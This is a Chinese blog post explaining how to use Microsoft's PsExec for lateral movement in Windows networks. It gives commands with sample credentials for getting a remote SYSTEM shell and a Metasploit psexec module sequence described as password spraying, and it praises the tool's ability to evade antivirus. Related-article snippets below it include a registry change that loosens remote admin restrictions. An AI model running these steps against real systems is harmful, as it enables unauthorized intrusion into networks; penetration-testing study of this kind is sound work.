横向渗透之PsExec工具使用

已于 2022-05-25 21:48:17 修改
阅读量3.7k 收藏 13
点赞数 2
分类专栏: 内网安全 文章标签: 安全 网络安全 web安全 渗透测试
于 2022-04-16 16:59:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46258964/article/details/124216187
版权
本文介绍了Psexec工具的工作原理和使用方法,包括如何利用该工具进行本地提权和横向入侵,以及如何躲避杀毒软件检测。此外,还提到了Metasploit框架中的Psexec模块在密码喷洒攻击中的应用,以及Psexec在其他安全框架中的整合。Psexec的特性使其能直接获取system权限,但同时也可能被用于恶意活动。
摘要由CSDN通过智能技术生成

psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限
PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程,
并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。

PsExec的基本原理是:
通过管道在远程目标机器上创建一个psexec服务,
并在本地磁盘中生成一个名为PSEXESVC的二进制文件,
然后通过psexec服务运行命令,运行结束后删除任务。

利用条件

445端口开放,
知道目标账号密码

PsExec下载地址
优点:可以躲避检测无视杀毒软件,直接system权限

https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

基本使用命令

``
PsExec.exe /s cmd # 本地提权,还有一个提权作用,直接system权限

PsExec.exe \127.0.0.1 -u Administrator -p 123qwe@@ /s cmd # 本地提权

PsExec.exe \172.16.1.132 -u Administrator -p 123qwe@@ /s cmd # 横向入侵Windows主机,直接system权限
``

直接返回一个system权限的shell

在这里插入图片描述

Metasploit中的psexec模块
密码喷洒指的是用一个密码对多个账号对目标进行枚举爆破,躲避密码输入错误过多导致封锁账号

利用metasploit进行密码喷洒
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set smbuser user.txt
msf6 exploit(windows/smb/psexec) > set smbpass password.txt
msf6 exploit(windows/smb/psexec) > set rhost 172.16.1.132
msf6 exploit(windows/smb/psexec) > run

成功后直接返回一个system权限的主机上线msf

很多框架的集成了psexec工具,比如CS内网大杀器也结成了这个工具。总之就是牛逼6666

西湖第一剑
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-【横向移动】PsExec工具远程命令执行横向移动
lza20001103的博客
09-02 1576
横向移动】PsExec工具远程命令执行横向移动 文章目录【横向移动】PsExec工具远程命令执行横向移动PsExec介绍 PsExec介绍 psexec 是 windows 下非常好的一款远程命令行工具psexec使用不需要对方主机开方3389端口, 只需要对方开启admin共享和ipc共享和ipc共享和ipc (该共享默认开启,依赖于445端口)。 但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。 由于psexec是Windo
内网渗透(四十一)之横向移动篇-PsExec工具远程命令执行横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 483
psexec 是 windows 下非常好的一款远程命令行工具psexec使用不需要对方主机开方3389端口,只需要对方开启admin共享和ipc共享和ipc共享和ipc(该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中psExec下载。
psexec的用法 例
11-03
PsExec 开关 说明 -a 指定处理器关联。 -c 指示是否应将应用程序复制到远程系统。 -d 指定在退出前不等待进程结束(不等待成功或失败的消息)。 -e 使用指定帐户的配置文件加载。 -f 即使远程系统上存在该应用程序也进行复制。确保运行当前(或特定)版本。 -i 在远程系统上以交互方式运行应用程序(如果想要某位最终用户看到该应用程序的任何用户界面,则必须采用这种模式)。 -l 以受限用户身份运行应用程序。删除管理员组令牌并且将进程权限降至用户组成员的权限级别。便于以最低权限运行高风险、面向 Internet 的应用程序。 -n 指定在与远程计算机连接失败之前等待的超时时间。 -priority 按指定的优先级运行进程。即,指定 Windows 应为给定任务所设的进程优先级(-low、-belownormal、-abovenormal、-high 或 –realtime)。 -s 使用系统帐户运行进程(便于运行 Regedit 来访问权限内的注册表项)。 -v 只在所复制应用程序为更高版本时才复制该应用程序。 -x 在 Winlogon 安全桌面上显示 UI(仅适用于本地系统)。 @file 针对文本文件中所指定的所有计算机运行该命令。
渗透测试笔记】之【内网渗透——横向移动:PsExec使用
AA8j的博客
11-18 8060
文章目录1. PsTools工具包中的PsExec1.1 注意事项1.2 使用方法1.2.1 获得交互式shell1.2.2 执行单条命令并回显2. CS中的PsExec2.1 查看目标所在网段其它主机2.2 使用PsExec横向移动3. msf中的PsExec3.1 添加路由3.2 加载模块,设置目标IP、账号、密码及设置payload 1. PsTools工具包中的PsExec 地址:https://download.sysinternals.com/files/PSTools.zip 1.1 注意事项
PsExec横向:IPC&PTH&PTT
最新发布
8888的博客
07-28 898
PsExec工具psexec 是 windows 下非常好的一款远程命令行工具psexec使用不需要对方主机开方3389端口,只需要对方开启admin$共享和ipc$ (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。
psexec 用法
编程岁月
02-13 6568
   简介  实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。PsExec 最强大的功能之一是在远程
psexec使用
好好学习,天天向上
11-18 1008
psexe简介 本资料来自官网 介绍 psexe是一种轻量级的远程连接工具,可远程执行命令 基于IPC共享,所以要目标打开445端口 下载地址 https://download.sysinternals.com/files/PSTools.zip ps工具包中还有这些工具PsExec - 远程执行进程 ◆PsFile - 显示远程打开的文件 ◆PsGetSid - 显示计算机或用户的 SID ...
强大工具psexec工具用法简介
weixin_30809333的博客
08-30 502
原文链接地址:https://www.cnblogs.com/boltkiller/articles/4791307.html psexec是sysinternals的一款强大的软件,通过他可以提权和执行远程命令,对于批量大范围的远程运维能起到很好的效果,尤其是在域环境下。通常,这个命令,常用的有如下2种方式。 1.以系统身份运行指定应用程序 这个很简单,但是很有意思,Windows系统中a...
PsExec 实用工具
方冬_肖
08-19 2592
PsExec 实用工具 简介: 1.PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。 2.PsExec 最强大的功能之一是在远程系统和远程支持工具(如 IpConfig)中启动交互式命令提示窗口,以便显示无法通过其他方式显示的有关远程系统的信息。 安装(绿色版) 只需将 PsExec 解压并复制到可执行路径,打开cmd命令窗口。 键入“psexec”可显示其使用语法。 PsExec 可在 Windows
内网渗透-横向移动外部工具使用
lza20001103的博客
10-01 2238
横向移动外部工具使用 前言 文章目录横向移动外部工具使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
内网安全学习(三)---横向渗透
qi_SJQ_的博客
02-09 1058
横向 smb&wmi 明文或 hash 传递 1.前置知识: 知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码。 Windows2012以下版本安装KB2871997补丁,也会导致无法获取明文密码。 针对以上情况,我们提供了4种方式解决此类问题: 1.利用哈希hash传递(pth,ptk等)进行移动。 2.利用其他服务协议(SMB,WMI等)进行哈希移动。 3.利用注册表操作开启Wdigest Auth值进行获取。 4.利用工具或第三方平台(
psexec
05-01
可以实现用system用户登陆系统的工具,用法:结束explorer进程后,在cmd中执行:PsExec -i -s -d explorer
PsExec.exe
07-20
实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。PsExec 最强大的功能之一是在远程系统和远程支持工具(如 IpConfig)中启动交互式命令提示窗口,以便显示无法通过其他方式显示的有关远程系统的信息。
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1362
内网环境下的横向移动总结
win10 PSexec正确使用方法
如鹿渴慕泉水的专栏
03-09 1658
在目标机 reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f gpupdate /force ![aaa](https://img-blog.csdnimg.cn/20210309195756465.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naG
PsExec
mingyqf的博客
02-20 863
简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。后来因为太过方便,被利用到内网渗透之中。现在PsExec类的工具有各种语言的实现,如Metasploit的psexec psexec psh, Impacket psexec, pth-winexe, Empire Invoke-Psexec等等。 PsExec是一个轻量级的telnet替代工具,它使您
横向远程命令执行——PSEXEC
SheXinK’s Blog
12-28 917
横向远程命令执行——PSEXEC1、 测试环境2、 PSEXEC命令执行2.1 psexec.exe   PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。PsExec 最强大的功能之一是在远程系统和远程支持工具(如 IpConfig)中启动交互式命令提示窗口,以便显示无法通过其他方式显示的有关远...
Psexec工具使用总结
weixin_30411819的博客
04-22 435
在远程计算机之前,要用cmdkey /add:remoteIP /user:username /pass:password这个命令把对方的计算机加入凭证中 这样就可以进行后面的操作了,但是主控计算机和被控计算机在连接时会产生一个sessionID,这个sessionID要放到参数-i 后面 比如命令C:\PSTools\psexec \\remoteIP -s -i (sessionID) "...
psexec工具使用浅析(admin$ or c$)
谢公子的博客
12-19 2909
目录 Psexec 工作组环境 域环境 登录域控 以域用户登录域成员主机 以本地用户登录域成员主机 MSF中的psexec模块 Impacket中的psexec.py Psexec psexec 是 windows 下非常好的一款远程命令行工具psexec使用不需要对方主机开机3389端口,只需要对方开启admin$共享(该共享默认开启)。但是,假如目标主机开启了防火墙,p...
jenkins安装PsExec工具
09-27
您可以按照以下步骤在Jenkins上安装PsExec工具: 1. 首先,确保您的Jenkins服务器具有管理员权限。 2. 在Jenkins主页上,点击"Manage Jenkins"(管理Jenkins)。 3. 在管理页面上,点击"Manage Plugins"(管理插件)。 4. 在"Available"(可用)选项卡中,搜索"PsExec"。 5. 找到"PsExec Plugin"(PsExec插件),勾选它并点击"Install without restart"(无需重启安装)。 6. 安装完成后,重启Jenkins服务器以使更改生效。 现在,您的Jenkins服务器已经安装了PsExec工具。您可以在构建任务的配置中使用工具。请注意,您需要在Jenkins服务器上正确配置PsExec工具的路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值